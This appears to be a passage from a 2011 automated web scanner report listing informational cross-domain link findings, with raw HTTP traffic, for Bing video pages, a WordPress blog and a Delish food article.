Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=556
Content-Length: 104959
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:09:22 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:05 GMT
Connection: close
Set-Cookie: _SS=SID=2B26CC69B7AE484CA5563E88686D052E; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:05 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2cf00799a29aba406fac6b308bdc571c11; expires=Tue, 29-Jan-2013 17:00:05 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:05 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhere-it-all-began%2f17wv375x2%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/who-do-you-think-you-are" data-instName="InfoRelatedLinks">Hulu - Who Do You Think You Are?</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.hulu.com/watch?content_id=50117868" data-instName="InfoRelatedLinks">Hulu Watch Page - Where It All Began</a>
...[SNIP]...
s="motionThumb playerUrl"
title="Eight of our most favorite celebrities travel the globe to unlock the mysteries of their heritage." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=c54b46a6-0935-40a0-b5bc-d168ded2e84c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
%20are&rel=MSN" class="motionThumb playerUrl"
title="The amazing journies of celebrities' pasts is back for season two on February 4th." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=28b30d21-82db-4788-9b33-1a1558ad6b5b&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
Url"
title="Discover the singing star's connection to George Washington on this season of Who Do You Think You Are?" >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=d7cbcfd2-5c80-43aa-92b3-da80c740b8d9&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Vanessa makes a fascinating discovery about her great great grandfather." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=4199fb4f-0aa2-47ec-88dc-e308ea0b56d2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
0think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="Eight of today's hottest celebrities learn how history has shaped their lives." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=53511df1-cab0-4899-b3ac-57fd23e16f42&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
humb playerUrl"
title="Vanessa's journey into her family's past being with a visit to her father's final resting place." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=7a2f818c-56ef-4d3b-a7f5-cc654d6c17ed&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
km4?q=who%20do%20you%20think%20you%20are&rel=MSN" class="motionThumb playerUrl"
title="A look at singing star Tim McGraw's incredible upcoming journey." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=a4423ac0-090e-40c9-8a6a-3ec31bb067a7&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
" class="motionThumb playerUrl"
title="Vanessa Williams makes more than one rare discovery at the National Archives in Washington, D.C." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=1f9e42d4-9168-44cd-be7a-a673ec791b6a&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
lass="motionThumb playerUrl"
title="Get to know Vanessa as she's about to embark on the journey of not just one lifetime..." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=374bde5b-6704-4192-a1f6-9146f8d2ebd2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
x celebrities on a journey to discover their roots in the NBC reality series, "Who Do You Think You Are?"" >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=9bc269b0-2581-11df-a9a6-5a3963a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

22.414. http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo

Issue detail

The page was loaded from a URL containing a query string:

http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo?q=regis+philbin&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42007

The response contains the following links to other domains:

http://advertising.microsoft.com/advertise-on-bing
http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js
http://g.live.com/9uxp9en-us/ftr1
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://go.microsoft.com/fwlink/?LinkId=74170
http://img1.catalog.video.redacted/Image.aspx?uuid=180752e6-2929-11e0-80b2-7499c954006e&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4
http://img1.catalog.video.redacted/Image.aspx?uuid=e27771f6-4bd3-43c8-9abe-135a1940a718&w=400&h=300&so=4
http://img1.video.s-msn.com/res/1.0.3710.02/css/BingStyles.css
http://img1.video.s-msn.com/res/1.0.3710.02/i/videoModule/timer.gif
http://img2.catalog.video.redacted/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9c1016cc-624c-11de-b2cf-b97863a74c6d&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=b43c7a30-8081-11de-8810-4a2d63a74c6d&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=b616d120-231e-11e0-af39-72a4c954006e&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=d0ff9b12-8007-11df-b6f8-246863a74c6d&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=dd7af19d-774f-40f8-80a7-753b101261dc&w=160&h=90&so=4
http://img2.catalog.video.redacted/Image.aspx?uuid=f903c424-143f-49b8-bb63-d61757a06410&w=160&h=90&so=4
http://img2.video.s-msn.com/res/1.0.3710.02/js/BingPost.js
http://img2.video.s-msn.com/res/1.0.3710.02/js/VideoPre.js
http://img3.catalog.video.redacted/Image.aspx?uuid=2fe417d3-cdbc-4287-b4e1-1d5dd61261ab&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=a0277586-a2d4-4f0e-bf91-95696b01b3b2&w=160&h=90&so=4
http://img4.catalog.video.redacted/Image.aspx?uuid=b02dc69c-806c-4247-a58d-56fa504ecc08&w=160&h=90&so=4
http://mail.live.com/
http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx
http://video.accesshollywood.com/player/?id=0
http://www.accesshollywood.com/
http://www.accesshollywood.com/photos/
http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhos-the-one-guest-regis-could-never-get%2f6fzsvmo%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21
http://www.redacted/

Request

GET /videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo?q=regis+philbin&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42007 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=339
Content-Length: 110386
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:05:41 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 17:00:01 GMT
Connection: close
Set-Cookie: _SS=SID=925EBC60E33D4C1CA70E8FAF877FB5F3; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:00:01 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c2afb2e20bb4741dd83bdc8cb94e3cae7; expires=Tue, 29-Jan-2013 17:00:01 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621020&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:00:01 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo" /><link rel="image_src" href="http://img1.catalog.video.redacted/Image.aspx?uuid=e27771f6-4bd3-43c8-9abe-135a1940a718&w=400&h=300&so=4" type="" title="" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http://col.stj.s-redacted/br/sc/js/jquery/jquery-1.4.2.min.js"></script><script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fwhos-the-one-guest-regis-could-never-get%2f6fzsvmo%3ffrom%3den-us_fblike&locale=en_US&layout=button_count&show_faces=false&width=90&action=like&font=arial&colorscheme=dark&height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http://img1.video.s-redacted/res/1.0.3710.02/i/videoModule/timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.accesshollywood.com/" data-instName="InfoRelatedLinks">Access Hollywood</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://video.accesshollywood.com/player/?id=0" data-instName="InfoRelatedLinks">Access Hollywood Video</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http://www.accesshollywood.com/photos/" data-instName="InfoRelatedLinks">Access Hollywood Photos</a>
...[SNIP]...
SN" class="motionThumb playerUrl"
title="Regis Philbin presents the "Top Ten Reasons Regis Philbin Is Not On the Show Tonight."" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=dd7af19d-774f-40f8-80a7-753b101261dc&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
NATPE Brandon Tartikoff Legacy Award in Miami on Tuesday where Mary presented Regis with an offer he couldn't refuse." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=180752e6-2929-11e0-80b2-7499c954006e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
Jan. 18: After over 40 years, Regis Philbin is retiring from his weekday talk show. NBC's Brian Williams reports." >

<img class="thumb thumbSize" src="http://img3.catalog.video.msn.com/Image.aspx?uuid=2fe417d3-cdbc-4287-b4e1-1d5dd61261ab&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 Awards" live from Las Vegas this Sunday. "ET" catches up with the him as he gets ready for the show." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=d0ff9b12-8007-11df-b6f8-246863a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
&rel=MSN" class="motionThumb playerUrl"
title="ET is on the set of 'Who Wants To Be A Millionaire' with host Regis Philbin." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=b43c7a30-8081-11de-8810-4a2d63a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
ces his departure from "LIVE! with Regis and Kelly" and "My Strange Addiction" features a couch-eating woman." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=b616d120-231e-11e0-af39-72a4c954006e&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;Regis really retiring?  Get a preview of Dave's conversation with Regis Philbin, tonight on the "Late Show."" >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=f903c424-143f-49b8-bb63-d61757a06410&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
b028m1i?q=regis%20philbin&rel=MSN" class="motionThumb playerUrl"
title="Regis talks to ET about the loss of Michael Jackson and Farrah Fawcett." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9c1016cc-624c-11de-b2cf-b97863a74c6d&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
philbin/pa3lzfyn?q=regis%20philbin&rel=MSN" class="motionThumb playerUrl"
title="Check out this How I Met Your Mother scene featuring Regis Philbin" >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=b02dc69c-806c-4247-a58d-56fa504ecc08&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;Philbin delivered the news at the start of this morning's "Live With Regis and Kelly." Msnbc's Chris Jansing" >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=a0277586-a2d4-4f0e-bf91-95696b01b3b2&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
en shot and killed while trying to storm the Egyptian interior ministry in Cairo. CBNC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img1.catalog.video.msn.com/Image.aspx?uuid=e177ac59-7cfe-4492-a8b4-55915bc801ac&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
unt of snow residents in the Northeast can expect to see as well as a chilly system expected to hit the West." >

<img class="thumb thumbSize" src="http://img4.catalog.video.msn.com/Image.aspx?uuid=9496e26e-5c57-466b-bd0d-af7ab8a49f84&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
streets of Cairo, Egypt, while continuing to demand the removal of President Mubarak. CNBC's Yousef Gamal El-Din reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=93f4a343-3ee5-49a2-bfa8-99e055385b9c&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
;a gorilla in a British wildlife preserve that’s becoming an internet sensation by the way he walks like a man." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=38ae05db-21f0-4232-935c-dc0482988d92&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
 fine diplomatic line with Egyptian officials as unrest grows in the streets of Cairo. NBC's Andrea Mitchell reports." >

<img class="thumb thumbSize" src="http://img2.catalog.video.msn.com/Image.aspx?uuid=9f5e7858-a321-4506-bd48-5fe5c11524e4&w=160&h=90&so=4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&ID=FD,52.1')">© 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://img2.video.s-redacted/res/1.0.3710.02/js/BingPost.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dabagirls.com
Path:	/\|http:/www.stylemepretty.com/\|http:/stylehive.com\|http:/stylelist.com\|http:/www.outblush.com/\|http:/www.dooce.com/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The page was loaded from a URL containing a query string:

http://www.dabagirls.com/|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944

The response contains the following links to other domains:

http://stats.wordpress.com/e-201104.js
http://tarskitheme.com/
http://wordpress.org/

Request

GET /|http:/www.stylemepretty.com/|http:/stylehive.com|http:/stylelist.com|http:/www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/?\w+|mtv.com/$|mtv.com/ontv/\?\w+|mtv.com/ontv/$|http://www.pcmag.com/&|http://www.pcmag.com/reviews|http://www.pcmag.com/category2/0,2806,24,00.asp|http://www.pcmag.com/category2/0,2806,9,00.asp|http://www.pcmag.com/category2/0,2806,4829,00.asp|http://www.pcmag.com/category2/0,2806,2201,00.asp|office.microsoft.com|www.healthline.com/$|http://www.terra.com.mx/default.htm|http://www.terra.com/$|www.people.com/$|http://www.walmart.com/|http://www.walmart.com/cp/toys/4171|http://www.walmart.com/cp/Electronics/3944 HTTP/1.1
Host: www.dabagirls.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 01:52:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Vary: Cookie
X-Pingback: http://www.dabagirls.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sun, 30 Jan 2011 01:52:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="en-US">

<head
...[SNIP]...
<p>Powered by <a href="http://wordpress.org/">WordPress</a> and <a href="http://tarskitheme.com/">Tarski</a>
...[SNIP]...
</div><script src="http://stats.wordpress.com/e-201104.js" type="text/javascript"></script>
...[SNIP]...

22.416. http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.delish.com
Path:	/food/recalls-reviews/its-not-bakery-its-digiorno

Issue detail

The page was loaded from a URL containing a query string:

http://www.delish.com/food/recalls-reviews/its-not-bakery-its-digiorno?gt1=47001

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.microsoft.com/home/home
http://advertising.microsoft.com/home/home.asp
http://analytics.live.com/Analytics/wlAnalytics.js
http://articles.redacted/video/default.aspx
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://blstj.redacted/br/gbl/js/2/report.js
http://blstj.redacted/br/gbl/js/4/mozcompat.js
http://blstj.redacted/br/gbl/js/7/core.js
http://careers.redacted/
http://cdn.krxd.net/krux.js
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://download.live.com/?sku=messenger
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/superfans/
http://entertainment.msn.com/video/
http://g.redacted/0TO_/enus
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://health.redacted/diet-and-fitness.aspx
http://hearstmagazines.112.2o7.net/b/ss/hmagglobal/1/H.22.1--NS/0
http://hotmail.redacted/
http://images.video.msn.com/js/ch/channels.js
http://lifestyle.redacted/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-life/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/
http://local.redacted/gas-traffic.aspx
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://moneycentral.msn.com/detail/stock_quote
http://moneycentral.msn.com/home.asp
http://moneycentral.msn.com/investor/home.aspx
http://moneycentral.msn.com/personal-finance/
http://movies.redacted/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cbk
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/mlb
http://msn.foxsports.com/name/public/siteIndex
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video
http://msn.whitepages.com/
http://music.redacted/
http://my.redacted/
http://privacy.microsoft.com/en-us/fullnotice.mspx
http://realestate.redacted/
http://specials.redacted/alphabet.aspx
http://tech.redacted/
http://today.msnbc.msn.com/
http://tv.redacted/
http://video.redacted/video.aspx?mkt=en-us&from=MSNHP
http://video.msnbc.com/
http://w.sharethis.com/button/sharethis.js;onmouseover=false
http://wonderwall.redacted/
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?FORM=DELISH
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.boingboing.net/2011/01/24/frozen-pizza-and-fro.html
http://www.digiorno.com/
http://www.facebook.com/digiorno?v=wall
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.msnbc.redacted/id/3032076/ns/health
http://www.msnbc.redacted/id/3032118/ns/technology_and_science
http://www.msnbc.redacted/id/3032507/ns/world_news
http://www.msnbc.redacted/id/3032525/ns/us_news
http://www.msnbc.redacted/id/3032553/ns/politics
http://www.msnbc.redacted/id/3096434/ns/msnbc_tv
http://www.myhomeredacted/
http://www.pingg.com/account/products/create_invite?customize=delish&design_category_to_open=delish&partner=delish
http://yellowpages.msn.com/
http://zone.redacted/en-us/home
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

Response

HTTP/1.1 200 OK
Server: Apache
Content-Length: 93291
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=504
Date: Sat, 29 Jan 2011 23:53:33 GMT
Connection: close

